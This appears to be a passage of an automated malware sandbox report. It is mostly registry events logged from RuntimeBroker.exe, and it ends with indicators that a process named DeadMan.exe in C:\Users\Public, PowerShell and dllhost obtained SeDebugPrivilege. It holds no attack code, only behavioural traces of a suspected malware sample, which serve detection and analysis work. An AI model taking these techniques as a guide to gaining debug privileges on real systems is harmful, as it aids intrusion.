4e1e110c3290e64cec9484ef11bdbf4a034d48373c38f5ff7f6815af488ec1ee4e1e110c3290e64cec9484ef11bdbf4a034d48373cce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003000340035003500320031003100320032002d003500390030003200390034003400320033002d0033003400360035003600380030003200370034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000f59c2d61000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5723faf7-2499-43b4- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eefedfd4-3bcc-4c2b- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e1c74377-b88c-42ed- = 70697232452bdb01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e1c74377-b88c-42ed- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d962160-4e55-48da- = 75928933452bdb01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b0497cab-f484-413c- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13ce8255-4122-4560- = ff9c6832452bdb01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e1c74377-b88c-42ed- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5723faf7-2499-43b4- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b0497cab-f484-413c- = 401d7c32452bdb01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d962160-4e55-48da- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13ce8255-4122-4560- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000da6b6132452bdb01da6b6132452bdb01da6b6132452bdb01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000005f59c71b2000316236623939346436353334323361363734616562323231333036383037326437666264336232646537353131623364373566653538643935333930313836300000b20009000400efbe5f59c71b5f59c71b2e0000000000000000000000000000000000000000000000000026fb4300310062003600620039003900340064003600350033003400320033006100360037003400610065006200320032003100330030003600380030003700320064003700660062006400330062003200640065003700350031003100620033006400370035006600650035003800640039003500330039003000310038003600300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000e94cfe7f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c31623662393934643635333432336136373461656232323133303638303732643766626433623264653735313162336437356665353864393533393031383630000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006b626b776765626b000000000000000038f5ff7f6815af488ec1ee4e1e110c328ce64cec9484ef11bdbf4a034d48373c38f5ff7f6815af488ec1ee4e1e110c328ce64cec9484ef11bdbf4a034d48373cce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003000340035003500320031003100320032002d003500390030003200390034003400320033002d0033003400360035003600380030003200370034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000f59c2d61000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35fb5116-21cd-4f3f- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13ce8255-4122-4560- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\70b16702-30ba-4f69- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b792a590-2885-4266- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5723faf7-2499-43b4- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5723faf7-2499-43b4- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000fba2b932452bdb01f4e46535452bdb01f4e46535452bdb019ce108000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000005f59c71b2000346333363761373837653435653863303932356637336365613763343138653565386461666232353031643565666461326630396139323534353737393538630000b20009000400efbe5f59c71b5f59c71b2e00000000000000000000000000000000000000000000000000b3232c00340063003300360037006100370038003700650034003500650038006300300039003200350066003700330063006500610037006300340031003800650035006500380064006100660062003200350030003100640035006500660064006100320066003000390061003900320035003400350037003700390035003800630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000e94cfe7f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34633336376137383765343565386330393235663733636561376334313865356538646166623235303164356566646132663039613932353435373739353863000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006b626b776765626b000000000000000038f5ff7f6815af488ec1ee4e1e110c3299e64cec9484ef11bdbf4a034d48373c38f5ff7f6815af488ec1ee4e1e110c3299e64cec9484ef11bdbf4a034d48373cce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003000340035003500320031003100320032002d003500390030003200390034003400320033002d0033003400360035003600380030003200370034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000f59c2d61000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c4f852f5-743e-4b8a- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3d33358c-291a-4112- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000008e7ab232452bdb0124ea4333452bdb0124ea4333452bdb01caf809000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000005f59c71b2000383639376533306264643630333761626465623732656335366164336134613934393832396338333838343734343935613035336365303538343838626332370000b20009000400efbe5f59c71b5f59c71b2e000000000000000000000000000000000000000000000000009cb13c00380036003900370065003300300062006400640036003000330037006100620064006500620037003200650063003500360061006400330061003400610039003400390038003200390063003800330038003800340037003400340039003500610030003500330063006500300035003800340038003800620063003200370000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000e94cfe7f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c38363937653330626464363033376162646562373265633536616433613461393439383239633833383834373434393561303533636530353834383862633237000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006b626b776765626b000000000000000038f5ff7f6815af488ec1ee4e1e110c3294e64cec9484ef11bdbf4a034d48373c38f5ff7f6815af488ec1ee4e1e110c3294e64cec9484ef11bdbf4a034d48373cce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003000340035003500320031003100320032002d003500390030003200390034003400320033002d0033003400360035003600380030003200370034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000f59c2d61000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\78b2e159-0966-4d11- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0af9700c-b0bb-40c1- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c4f852f5-743e-4b8a- = ac6e7a32452bdb01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b0497cab-f484-413c- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d962160-4e55-48da- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35fb5116-21cd-4f3f- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\91205fb4-cc23-4cc3- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\91205fb4-cc23-4cc3- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000076b5cc32452bdb01bcfdfc34452bdb01bcfdfc34452bdb01bc3d0c000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000005f59c71b2000386461396534613238393639643864653130373831623464303135396466383565353739336166653238653435633539313739353963343935356538333530620000b20009000400efbe5f59c71b5f59c71b2e00000000000000000000000000000000000000000000000000094c3300380064006100390065003400610032003800390036003900640038006400650031003000370038003100620034006400300031003500390064006600380035006500350037003900330061006600650032003800650034003500630035003900310037003900350039006300340039003500350065003800330035003000620000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000e94cfe7f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c38646139653461323839363964386465313037383162346430313539646638356535373933616665323865343563353931373935396334393535653833353062000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006b626b776765626b000000000000000038f5ff7f6815af488ec1ee4e1e110c3298e64cec9484ef11bdbf4a034d48373c38f5ff7f6815af488ec1ee4e1e110c3298e64cec9484ef11bdbf4a034d48373cce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003000340035003500320031003100320032002d003500390030003200390034003400320033002d0033003400360035003600380030003200370034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000f59c2d61000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2e198222-d599-479a- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b792a590-2885-4266- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\91205fb4-cc23-4cc3- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b0497cab-f484-413c- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35fb5116-21cd-4f3f- = b636c833452bdb01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\70b16702-30ba-4f69- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000e4efc732452bdb01c1b73434452bdb01c1b73434452bdb014f2b0a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000005f59c71b2000316236623939346436353334323361363734616562323231333036383037326437666264336232646537353131623364373566653538643935333930313836300000b20009000400efbe5f59c71b5f59c71b2e0000000000000000000000000000000000000000000000000026fb4300310062003600620039003900340064003600350033003400320033006100360037003400610065006200320032003100330030003600380030003700320064003700660062006400330062003200640065003700350031003100620033006400370035006600650035003800640039003500330039003000310038003600300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000e94cfe7f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c31623662393934643635333432336136373461656232323133303638303732643766626433623264653735313162336437356665353864393533393031383630000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006b626b776765626b000000000000000038f5ff7f6815af488ec1ee4e1e110c3297e64cec9484ef11bdbf4a034d48373c38f5ff7f6815af488ec1ee4e1e110c3297e64cec9484ef11bdbf4a034d48373cce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003000340035003500320031003100320032002d003500390030003200390034003400320033002d0033003400360035003600380030003200370034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000f59c2d61000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\DeadMan.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
